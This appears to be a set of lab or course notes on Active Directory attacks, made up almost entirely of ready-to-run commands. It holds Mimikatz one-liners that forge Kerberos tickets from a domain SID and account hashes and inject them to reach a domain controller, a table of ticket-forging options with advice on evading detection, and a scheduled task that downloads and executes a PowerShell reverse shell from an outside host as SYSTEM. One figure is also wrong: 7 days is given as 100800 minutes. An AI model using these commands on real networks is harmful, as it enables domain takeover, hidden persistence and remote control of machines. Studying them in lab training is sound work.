Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21- 1874506631-3219952063-538504511 /target:dcorpdc.dollarcorp.moneycorp.local /service:CIFS /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /user:Administrator /ptt"'
Invoke-Mimikatz -Command
kerberos::golden kerberos::golden
/User:Administrator Username for which the TGT is generated
/domain:dollarcorp.moneycorp.local Domain FQDN
/sid:S-1-5-21-1874506631-3219952063-
538504511 SID of the domain
/krbtgt:ff46a9d8bd66c6efd77603da26796f35 NTLM (RC4) hash of the krbtgt account. Use /aes128 and
/aes256 for using AES keys which is more silent.
/service:cifs The SPN name of service for which TGS is to be created
/id:500 /groups:512 Optional User RID (default 500) and Group default 513 512 520
518 519)
/ptt
or
/ticket Injects the ticket in current PowerShell process - no need to
save the ticket on disk
Saves the ticket to a file for later use
/startoffset:0 Optional when the ticket is available (default 0 - right
now) in minutes. Use negative for a ticket available from
past and a larger number for future
/endin:600 Optional ticket lifetime (default is 10 years) in minutes.
The default AD setting is 10 hours = 600 minutes
/renewmax:10080 Optional ticket lifetime with renewal (default is 10 years)
in minutes. The default AD setting is 7 days = 100800
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21- 1874506631-3219952063-538504511 /target:dcorpdc.dollarcorp.moneycorp.local /service:HOST /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /user:Administrator /ptt"'
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''<http://192.168.100.1:8080/Invoke-PowerShellTcp.ps1>''')'"